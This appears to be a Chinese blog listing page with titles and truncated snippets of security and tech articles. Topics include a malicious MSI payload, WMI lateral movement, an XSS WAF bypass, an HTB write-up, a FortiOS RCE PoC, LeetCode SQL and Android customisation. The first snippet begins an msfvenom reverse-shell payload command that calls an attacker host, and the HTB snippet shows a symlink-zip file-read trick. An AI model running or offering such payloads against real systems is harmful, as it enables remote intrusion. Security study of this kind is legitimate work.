执行在 MSI(Microsoft 安装程序包)中生成恶意负载:攻击者@localmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LP...
如何修改安卓手,他的优点和缺点是什么呢
一方面对于非法乱改参数严格来说是违反相关法律的。另外机型芯片的不同 版本的不同其操作方法也不同。鉴于这几方面的原因。今天只是对其中有些做个简单的补充说明。1---改写参数的前提是什么答开启基...
wmi一些操作
使用wmic识别安装到系统中的补丁情况 1C:\> wmic qfe get description,installedOn 外部调用获取补丁情况 12select * from Win32_Q...
LeetCode 数据库专题
业精于勤荒于嬉,持续更新中。 没时间做了,要好好搬砖了。 简单1378. 使用唯一标识码替换员工IDSQL架构 Create table If Not Exists Employees (id int...
Android4.4~14及以上系统定制(高效通用的Android系统裁剪方案)
针对Android原生系统、RK平台、MTK平台、Qualcomm高通平台、其他平台,关于Android4.4~14及以上系统定制(高效通用的Android系统裁剪方案)一、传统裁剪方案build/m...
在input标签中如何绕过waf?
在几个星期以前,我碰到了一个xss 漏洞url: https://target.com/?product_name=test在源码中显示的是<input type="text" name="pr...
黑客(红队)攻防中内网环境下WMI的利用
WMI简介 WMI,全称Windows Management Instrumentation,是微软开发的一种用于管理Windows系统的工具。你可以把它想象成一个数据库工具,它存储了关于你的电脑的各...
HTB-Zipping笔记-新get shell
先生成恶意的pdf,然后使用burpsuite抓包,抓取product.php内容ln -s /var/www/html/shop/product.php lol.pdfzip --symlink l...
深入理解USB流量数据包的抓取与分析
0x01 问题提出在一次演练中,我们通过wireshark抓取了一个如下的数据包,我们如何对其进行分析?0x02 问题分析流量包是如何捕获的?首先我们从上面的数据包分析可以知道,这是个USB的流量包,...
浅谈对系统后期的信息收集
信息收集是我们渗透前期和后期最重要的环节。前期的信息收集都比较常规化,获得的信息有多有少。而当我们获得系统shell后。后期的信息收集就变得尤为重要!本文为大家介绍下,在windows环境中。常见的一...
POC速递 - Fortinet FortiOS SSL-VPN远程代码执行漏洞(CVE-2023-27997)
免责声明:本项目仅用于教育和道德测试。在未经事先相互同意的情况下使用此工具攻击目标是非法的。开发者不承担任何责任,也不对本工具造成的任何误用或损害负责。 Usage: python3 cve-2022...
【漏洞通告】Fortinet FortiOS SSL-VPN远程代码执行漏洞(CVE-2023-27997)
一、漏洞概述CVE IDCVE-2023-27997发现时间2023-06-12类 型RCE等 &nbs...